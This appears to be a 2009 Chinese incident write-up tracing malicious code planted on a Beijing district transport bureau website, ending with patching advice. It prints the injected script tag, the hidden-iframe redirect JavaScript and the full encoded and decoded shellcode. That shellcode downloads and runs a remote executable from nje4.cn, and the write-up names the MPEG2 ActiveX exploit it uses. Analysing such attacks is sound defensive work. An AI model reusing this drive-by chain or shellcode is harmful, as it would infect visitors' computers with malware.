北京市平谷区交通局网站被挂马

来源:互联网 发布:python 字典迭代 编辑:程序博客网 时间:2024/03/29 23:12

2009年07月22日 星期三 11:23

2009-7-22 11:00

hxxp://jtj.bjpg.gov.cn

首页底部挂马:

<script src=http://%6D%62%72%33%2E%63%6E></script>

Unescape解密得到:mbr3.cn

mbr3.cn内容如下

if (document.location.href.indexOf("gov")>=0)
{} else {document.write("<div style='display:none'>");
document.write("<iframe src=http://nje4.cn/01.htm></iframe>");
document.write("</div>");}


跟踪http://nje4.cn/01.htm,内容如下
<html>
<iframe src="123.htm" width=111 height=0 border=0></iframe>
<iframe src="dex.html" width=111 height=0 border=0></iframe>
<br>
<br>
<br>
<br>
<br>
<script type="text/javascript">
var allok=Math.floor(Math.random()*10000);if((allok>5000))
document.writeln("<script src='http://s17.cnzz.com/stat.php?id=1528016&web_id=1528016'

language='JavaScript' charset='gb2312'><//script>");</script>


然后跟踪http://nje4.cn/123.htm内容如下


<html>
<body>
<div id="DivID">
<script src='go.jpg'></script>
<script src='gd.jpg'></script>
<script src='go1.jpg'></script>
</body>
</html>

解密GO.JPG,

%uE890%u034D%u0000%u0068%u0020%u6A00%uFF00%uB9D0%u0800%u0000%uF88B%u05EB%uF35E%uFFA4%uE8D0%uFFF6%uFFFF%u54E8%u0003%u8B00%uE8F8%u0038%u0000%u64E8%u0001%uE800%u0046%u0000%uF2E8%u0003%u8B00%uE8F8%u0022%u0000%u5BE8%u0001%uE800%u0030%u0000%uA0E8%u0003%u8B00%uE8F8%u000C%u0000%u78E8%u0001%uE800%u001A%u0000%u58EB%u8B53%u53DC%u406A%u0068%u0010%u5700%uC8E8%u0002%uE800%u00FA%u0000%uC358%u8B53%u53DC%u206A%u0068%u0010%u5700%uB0E8%u0002%uE800%u00E2%u0000%uC358%uE857%u0453%u0000%uF88B%uC933%u3349%uB0C0%uFCC3%uAEF2%u478D%u5FFF%u5BC3%uC63E%uB807%u893E%u015F%u3E66%u47C7%uFF05%uC3E0%uACE9%u0004%u5B00%uEC81%u0114%u0000%uD48B%uC73E%u6302%u646D%u3E20%u42C7%u2F04%u2063%u3E22%u42C7%u6308%u646D%u3E20%u42C7%u2F0C%u2063%u8322%u10C2%uC033%u5050%u0468%u0001%u5200%u5053%uC8E8%u0003%uE800%u0072%u0000%uFC8B%uC78B%uC083%u3E08%u188A%uDB84%u0374%uEB40%u66F6%uC73E%u2200%u3322%u3ED2%u5088%u8302%u54EC%uC033%uDB33%uCC8B%uF883%u7D54%u3E09%u1C89%u8308%u04C0%uF2EB%uCC8B%uD98B%uC383%u3310%u3EC0%u43C7%u012C%u0000%u5100%u5053%u5050%u5050%u5750%uE850%u033B%u0000%u19E8%u0000%u6400%u04A1%u0000%u8D00%u60A0%uFFFF%uE8FF%u0339%u0000%uDB33%u5353%u5353%uD0FF%u3880%u74E9%u8005%uE838%u0F75%u7881%u9005%u4190%u7490%u5506%uEC8B%u408D%uFF05%uE8E0%uFF17%uFFFF%uE8C3%uFF11%uFFFF%u11B8%u0401%uC280%u000C%u04E8%uFFFF%u33FF%u50C0%uE854%u0054%u0000%uE850%u028B%u0000%uD0FF%u8036%u243C%u7700%uE80A%u0241%u0000%uFF33%uFF57%uE8D0%u01FB%u0000%uFF68%u0000%uFF00%uE8D0%uFED1%uFFFF%u5753%u3356%u50C0%uE854%u001E%u0000%uE850%u0255%u0000%uD0FF%u8036%u243C%u7700%uE80A%u020B%u0000%uFF33%uFF57%u58D0%u5F5E%uC35B%u02EB%uC358%uF9E8%uFFFF%u56FF%u8357%u08EC%uFC8B%u086A%u3E57%u77FF%uE814%u025D%u0000%uD0FF%uFC8B%u6168%u656D%u6800%u4549%u7246%uF48B%u08B9%u0000%uF300%u75A6%u6A2F%u3E00%u74FF%u2024%u24E8%u0002%uFF00%u8BD0%uE8F8%u01CB%u0000%uD0FF%uF83B%u0874%u8B36%u2444%u3E20%u00FF%uFF3E%u2474%uE81C%u01EF%u0000%uD0FF%uC483%u5F10%uB85E%u0001%u0000%u68C3%u6E6F%u0000%u7568%u6C72%uEB6D%u8D15%u2444%u5004%u0BE8%uFFFE%u50FF%u4AE8%u0002%uE900%uFEE0%uFFFF%uE6E8%uFFFF%u83FF%u08C4%u6AC3%u686C%u746E%u6C64%u15EB%u448D%u0424%uE850%uFDE4%uFFFF%uE850%u0223%u0000%uB9E9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u3368%u0032%u6800%u7375%u7265%u15EB%u448D%u0424%uE850%uFDBA%uFFFF%uE850%u01F9%u0000%u8FE9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u6368%u7776%u6800%u6873%u6F64%u15EB%u448D%u0424%uE850%uFD90%uFFFF%uE850%u01CF%u0000%u65E9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u7668%u7867%uEB00%u8D15%u2444%u5004%u6BE8%uFFFD%u50FF%uAAE8%u0001%uE900%uFE40%uFFFF%uE6E8%uFFFF%u83FF%u04C4%uE8C3%u01AB%u0000%u1B68%u46C6%u5079%uC6E8%u0001%u8300%u08C4%uE8C3%u0197%u0000%uEC68%u0397%u500C%uB2E8%u0001%u8300%u08C4%uE8C3%u0183%u0000%uAA68%u0DFC%u507C%u9EE8%u0001%u8300%u08C4%uE8C3%u016F%u0000%uED68%uEF56%u5036%u8AE8%u0001%u8300%u08C4%uE8C3%u015B%u0000%uF068%u048A%u505F%u76E8%u0001%u8300%u08C4%uE8C3%uFEF7%uFFFF%u7868%uDB68%u501C%u62E8%u0001%u8300%u08C4%uE8C3%u0133%u0000%uEF68%uE0CE%u5060%u4EE8%u0001%u8300%u08C4%uE8C3%u011F%u0000%uB068%u2D49%u50DB%u3AE8%u0001%u8300%u08C4%uE8C3%uFF36%uFFFF%uAB68%u9B5E%u501E%u26E8%u0001%u8300%u08C4%uE8C3%uFEA7%uFFFF%u5968%u8197%u5002%u12E8%u0001%u8300%u08C4%uE8C3%u00E3%u0000%u7E68%uE2D8%u5073%uFEE8%u0000%u8300%u08C4%uE8C3%u00CF%u0000%u9E68%uBBF9%u5035%uEAE8%u0000%u8300%u08C4%uE8C3%uFE92%uFFFF%u5768%uB5A0%u50BB%uD6E8%u0000%u8300%u08C4%uE8C3%uFE7E%uFFFF%u1A68%u1E7A%u5002%uC2E8%u0000%u8300%u08C4%uE8C3%uFE6A%uFFFF%uE068%u305B%u5094%uAEE8%u0000%u8300%u08C4%uE8C3%uFE56%uFFFF%u9768%uE2C9%u50A3%u9AE8%u0000%u8300%u08C4%uE8C3%uFE42%uFFFF%u6868%uC524%u50B3%u86E8%u0000%u8300%u08C4%uE8C3%u0057%u0000%u7268%uB3FE%u5016%u72E8%u0000%u8300%u08C4%uE8C3%uFE44%uFFFF%u13EB%u656A%uE850%uFBE0%uFFFF%uE850%uFEAB%uFFFF%uB5E9%uFFFC%uE8FF%uFFE8%uFFFF%uE8C3%uFDA9%uFFFF%u4F68%u4FEF%u5005%u3EE8%u0000%u8300%u08C4%uE8C3%u000F%u0000%u8E68%u0E4E%u50EC%u2AE8%u0000%u8300%u08C4%u33C3%u64C0%u408B%u8530%u78C0%u3E10%u408B%u3E0C%u708B%uAD1C%u8B3E%u0840%uEBC3%u3E0B%u408B%u8334%u7CC0%u8B3E%u3C40%u60C3%u8B36%u246C%u3624%u458B%u363C%u548B%u7828%uD503%u8B3E%u184A%u8B3E%u205A%uDD03%u3BE3%u3E49%u348B%u038B%u33F5%u33FF%uFCC0%u84AC%u74C0%uC107%u0DCF%uF803%uF4EB%u3B36%u247C%u7528%u3EDF%u5A8B%u0324%u66DD%u8B3E%u4B0C%u8B3E%u1C5A%uDD03%u8B3E%u8B04%uC503%u8936%u2444%u611C%uE8C3%uFB4F%uFFFF%u7468%u7074%u2f3a%u6e2f%u656a%u2e34%u6e63%u612f%u652e%u6578%u0000

用Freshow,按ESC,得

/x90/xE8/x4D/x03/x00/x00/x68/x00/x20/x00/x00/x6A/x00/xFF/xD0/xB9/x00/x08/x00/x00/x8B/xF8/xEB/x05/x5E/xF3/xA4/xFF/xD0/xE8/xF6/xFF/xFF/xFF/xE8/x54/x03/x00/x00/x8B/xF8/xE8/x38/x00/x00/x00/xE8/x64/x01/x00/x00/xE8/x46/x00/x00/x00/xE8/xF2/x03/x00/x00/x8B/xF8/xE8/x22/x00/x00/x00/xE8/x5B/x01/x00/x00/xE8/x30/x00/x00/x00/xE8/xA0/x03/x00/x00/x8B/xF8/xE8/x0C/x00/x00/x00/xE8/x78/x01/x00/x00/xE8/x1A/x00/x00/x00/xEB/x58/x53/x8B/xDC/x53/x6A/x40/x68/x00/x10/x00/x00/x57/xE8/xC8/x02/x00/x00/xE8/xFA/x00/x00/x00/x58/xC3/x53/x8B/xDC/x53/x6A/x20/x68/x00/x10/x00/x00/x57/xE8/xB0/x02/x00/x00/xE8/xE2/x00/x00/x00/x58/xC3/x57/xE8/x53/x04/x00/x00/x8B/xF8/x33/xC9/x49/x33/xC0/xB0/xC3/xFC/xF2/xAE/x8D/x47/xFF/x5F/xC3/x5B/x3E/xC6/x07/xB8/x3E/x89/x5F/x01/x66/x3E/xC7/x47/x05/xFF/xE0/xC3/xE9/xAC/x04/x00/x00/x5B/x81/xEC/x14/x01/x00/x00/x8B/xD4/x3E/xC7/x02/x63/x6D/x64/x20/x3E/xC7/x42/x04/x2F/x63/x20/x22/x3E/xC7/x42/x08/x63/x6D/x64/x20/x3E/xC7/x42/x0C/x2F/x63/x20/x22/x83/xC2/x10/x33/xC0/x50/x50/x68/x04/x01/x00/x00/x52/x53/x50/xE8/xC8/x03/x00/x00/xE8/x72/x00/x00/x00/x8B/xFC/x8B/xC7/x83/xC0/x08/x3E/x8A/x18/x84/xDB/x74/x03/x40/xEB/xF6/x66/x3E/xC7/x00/x22/x22/x33/xD2/x3E/x88/x50/x02/x83/xEC/x54/x33/xC0/x33/xDB/x8B/xCC/x83/xF8/x54/x7D/x09/x3E/x89/x1C/x08/x83/xC0/x04/xEB/xF2/x8B/xCC/x8B/xD9/x83/xC3/x10/x33/xC0/x3E/xC7/x43/x2C/x01/x00/x00/x00/x51/x53/x50/x50/x50/x50/x50/x50/x57/x50/xE8/x3B/x03/x00/x00/xE8/x19/x00/x00/x00/x64/xA1/x04/x00/x00/x00/x8D/xA0/x60/xFF/xFF/xFF/xE8/x39/x03/x00/x00/x33/xDB/x53/x53/x53/x53/xFF/xD0/x80/x38/xE9/x74/x05/x80/x38/xE8/x75/x0F/x81/x78/x05/x90/x90/x41/x90/x74/x06/x55/x8B/xEC/x8D/x40/x05/xFF/xE0/xE8/x17/xFF/xFF/xFF/xC3/xE8/x11/xFF/xFF/xFF/xB8/x11/x01/x04/x80/xC2/x0C/x00/xE8/x04/xFF/xFF/xFF/x33/xC0/x50/x54/xE8/x54/x00/x00/x00/x50/xE8/x8B/x02/x00/x00/xFF/xD0/x36/x80/x3C/x24/x00/x77/x0A/xE8/x41/x02/x00/x00/x33/xFF/x57/xFF/xD0/xE8/xFB/x01/x00/x00/x68/xFF/x00/x00/x00/xFF/xD0/xE8/xD1/xFE/xFF/xFF/x53/x57/x56/x33/xC0/x50/x54/xE8/x1E/x00/x00/x00/x50/xE8/x55/x02/x00/x00/xFF/xD0/x36/x80/x3C/x24/x00/x77/x0A/xE8/x0B/x02/x00/x00/x33/xFF/x57/xFF/xD0/x58/x5E/x5F/x5B/xC3/xEB/x02/x58/xC3/xE8/xF9/xFF/xFF/xFF/x56/x57/x83/xEC/x08/x8B/xFC/x6A/x08/x57/x3E/xFF/x77/x14/xE8/x5D/x02/x00/x00/xFF/xD0/x8B/xFC/x68/x61/x6D/x65/x00/x68/x49/x45/x46/x72/x8B/xF4/xB9/x08/x00/x00/x00/xF3/xA6/x75/x2F/x6A/x00/x3E/xFF/x74/x24/x20/xE8/x24/x02/x00/x00/xFF/xD0/x8B/xF8/xE8/xCB/x01/x00/x00/xFF/xD0/x3B/xF8/x74/x08/x36/x8B/x44/x24/x20/x3E/xFF/x00/x3E/xFF/x74/x24/x1C/xE8/xEF/x01/x00/x00/xFF/xD0/x83/xC4/x10/x5F/x5E/xB8/x01/x00/x00/x00/xC3/x68/x6F/x6E/x00/x00/x68/x75/x72/x6C/x6D/xEB/x15/x8D/x44/x24/x04/x50/xE8/x0B/xFE/xFF/xFF/x50/xE8/x4A/x02/x00/x00/xE9/xE0/xFE/xFF/xFF/xE8/xE6/xFF/xFF/xFF/x83/xC4/x08/xC3/x6A/x6C/x68/x6E/x74/x64/x6C/xEB/x15/x8D/x44/x24/x04/x50/xE8/xE4/xFD/xFF/xFF/x50/xE8/x23/x02/x00/x00/xE9/xB9/xFE/xFF/xFF/xE8/xE6/xFF/xFF/xFF/x83/xC4/x08/xC3/x68/x33/x32/x00/x00/x68/x75/x73/x65/x72/xEB/x15/x8D/x44/x24/x04/x50/xE8/xBA/xFD/xFF/xFF/x50/xE8/xF9/x01/x00/x00/xE9/x8F/xFE/xFF/xFF/xE8/xE6/xFF/xFF/xFF/x83/xC4/x08/xC3/x68/x63/x76/x77/x00/x68/x73/x68/x64/x6F/xEB/x15/x8D/x44/x24/x04/x50/xE8/x90/xFD/xFF/xFF/x50/xE8/xCF/x01/x00/x00/xE9/x65/xFE/xFF/xFF/xE8/xE6/xFF/xFF/xFF/x83/xC4/x08/xC3/x68/x76/x67/x78/x00/xEB/x15/x8D/x44/x24/x04/x50/xE8/x6B/xFD/xFF/xFF/x50/xE8/xAA/x01/x00/x00/xE9/x40/xFE/xFF/xFF/xE8/xE6/xFF/xFF/xFF/x83/xC4/x04/xC3/xE8/xAB/x01/x00/x00/x68/x1B/xC6/x46/x79/x50/xE8/xC6/x01/x00/x00/x83/xC4/x08/xC3/xE8/x97/x01/x00/x00/x68/xEC/x97/x03/x0C/x50/xE8/xB2/x01/x00/x00/x83/xC4/x08/xC3/xE8/x83/x01/x00/x00/x68/xAA/xFC/x0D/x7C/x50/xE8/x9E/x01/x00/x00/x83/xC4/x08/xC3/xE8/x6F/x01/x00/x00/x68/xED/x56/xEF/x36/x50/xE8/x8A/x01/x00/x00/x83/xC4/x08/xC3/xE8/x5B/x01/x00/x00/x68/xF0/x8A/x04/x5F/x50/xE8/x76/x01/x00/x00/x83/xC4/x08/xC3/xE8/xF7/xFE/xFF/xFF/x68/x78/x68/xDB/x1C/x50/xE8/x62/x01/x00/x00/x83/xC4/x08/xC3/xE8/x33/x01/x00/x00/x68/xEF/xCE/xE0/x60/x50/xE8/x4E/x01/x00/x00/x83/xC4/x08/xC3/xE8/x1F/x01/x00/x00/x68/xB0/x49/x2D/xDB/x50/xE8/x3A/x01/x00/x00/x83/xC4/x08/xC3/xE8/x36/xFF/xFF/xFF/x68/xAB/x5E/x9B/x1E/x50/xE8/x26/x01/x00/x00/x83/xC4/x08/xC3/xE8/xA7/xFE/xFF/xFF/x68/x59/x97/x81/x02/x50/xE8/x12/x01/x00/x00/x83/xC4/x08/xC3/xE8/xE3/x00/x00/x00/x68/x7E/xD8/xE2/x73/x50/xE8/xFE/x00/x00/x00/x83/xC4/x08/xC3/xE8/xCF/x00/x00/x00/x68/x9E/xF9/xBB/x35/x50/xE8/xEA/x00/x00/x00/x83/xC4/x08/xC3/xE8/x92/xFE/xFF/xFF/x68/x57/xA0/xB5/xBB/x50/xE8/xD6/x00/x00/x00/x83/xC4/x08/xC3/xE8/x7E/xFE/xFF/xFF/x68/x1A/x7A/x1E/x02/x50/xE8/xC2/x00/x00/x00/x83/xC4/x08/xC3/xE8/x6A/xFE/xFF/xFF/x68/xE0/x5B/x30/x94/x50/xE8/xAE/x00/x00/x00/x83/xC4/x08/xC3/xE8/x56/xFE/xFF/xFF/x68/x97/xC9/xE2/xA3/x50/xE8/x9A/x00/x00/x00/x83/xC4/x08/xC3/xE8/x42/xFE/xFF/xFF/x68/x68/x24/xC5/xB3/x50/xE8/x86/x00/x00/x00/x83/xC4/x08/xC3/xE8/x57/x00/x00/x00/x68/x72/xFE/xB3/x16/x50/xE8/x72/x00/x00/x00/x83/xC4/x08/xC3/xE8/x44/xFE/xFF/xFF/xEB/x13/x6A/x65/x50/xE8/xE0/xFB/xFF/xFF/x50/xE8/xAB/xFE/xFF/xFF/xE9/xB5/xFC/xFF/xFF/xE8/xE8/xFF/xFF/xFF/xC3/xE8/xA9/xFD/xFF/xFF/x68/x4F/xEF/x4F/x05/x50/xE8/x3E/x00/x00/x00/x83/xC4/x08/xC3/xE8/x0F/x00/x00/x00/x68/x8E/x4E/x0E/xEC/x50/xE8/x2A/x00/x00/x00/x83/xC4/x08/xC3/x33/xC0/x64/x8B/x40/x30/x85/xC0/x78/x10/x3E/x8B/x40/x0C/x3E/x8B/x70/x1C/xAD/x3E/x8B/x40/x08/xC3/xEB/x0B/x3E/x8B/x40/x34/x83/xC0/x7C/x3E/x8B/x40/x3C/xC3/x60/x36/x8B/x6C/x24/x24/x36/x8B/x45/x3C/x36/x8B/x54/x28/x78/x03/xD5/x3E/x8B/x4A/x18/x3E/x8B/x5A/x20/x03/xDD/xE3/x3B/x49/x3E/x8B/x34/x8B/x03/xF5/x33/xFF/x33/xC0/xFC/xAC/x84/xC0/x74/x07/xC1/xCF/x0D/x03/xF8/xEB/xF4/x36/x3B/x7C/x24/x28/x75/xDF/x3E/x8B/x5A/x24/x03/xDD/x66/x3E/x8B/x0C/x4B/x3E/x8B/x5A/x1C/x03/xDD/x3E/x8B/x04/x8B/x03/xC5/x36/x89/x44/x24/x1C/x61/xC3/xE8/x4F/xFB/xFF/xFF/x68/x74/x74/x70/x3a/x2f/x2f/x6e/x6a/x65/x34/x2e/x63/x6e/x2f/x61/x2e/x65/x78/x65/x00/x00

再按ESC

愯M h j 孁?^螭 鑄 孁?鑔 鐵栩 孁?鑋 ?锠 孁?鑨 ?隭S嬡Sj@h W枞 楮X肧嬡Sj h W璋 桠X肳鑃 孁3蒊3腊命虍岹 肹>??塤 f>荊 瞄 [侅 嬙>?cmd >荁 /c ">荁 cmd >荁 /c "兟 3繮Ph RSP枞 鑢孅嬊兝 >?勠t @膂f>?"3?圥 冹T3?蹕虄鳷} >? 兝 腧嬏嬞兠 3?荂, QSPPPPPPWP? ?d?崰` 3跾SSS 8閠 8鑥 亁 悙A恡 U嬱岪 ?? 繮T鑄P鑻 <$w
鐰 3 h 需瑶 SWV3繮T?P鑅 <$w
? 3 X^_[秒 X描? VW冹 孅j W> 鑍 孅hamehIEFr嬼?螃u/j> $ ? 孁 鴗 6婦$ > gt; $ 栾 _^?胔onhurlm?岲$ P?? 鐹 猷? 兡 胘lhntdl?岲$ P桎? ? 楣? 兡 胔32huser?岲$ P韬? 棂 閺? 兡 胔cvwhshdo?岲$ P钀? 柘 閑? 兡 胔vgx?岲$ P鑛? 瑾 锧? 兡 描?h 艶yP杵 兡 描?h鞐 P璨 兡 描?h
|P铻 兡 描o h鞻?P鑺 兡 描[ h饖 _P鑦 兡 描齄 hxh?P鑒 兡 描3 h镂郹P鐽 兡 描 h癐-跴? 兡 描6 玘?P? 兡 描 hY梺 P? 兡 描鉮~剽sP棹兡 描蟞烓?P桕兡 描揀 hW牭籔柚兡 描~? z P杪兡 描j? 郲0擯璁兡 描V? 椛猓P铓兡 描B? h$懦P鑶兡 描Whr P鑢兡 描D? jeP栲? 璜? 描 hO颫 P?兡 描 h嶯 霵?兡 ?纃婡0吚x >婡 >媝 ?婡 秒 >婡4兝|>婡<胉6媗$$6婨<6婽(x ?婮 >媄 葶;I>??? 傈瑒纓 料
?;|$(u?媄$ 輋>?K>媄 ????塂$ a描O? a href="http://nje4.cn/a.exe">http://nje4.cn/a.exe

最后跳到http://nje4.cn/a.exe

分析go1.jpg,clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF

为微软MPEG2漏洞。此漏洞微软官方已经发布补丁。

使用360安全卫士或其他工具修复系统漏洞即可


原创粉丝点击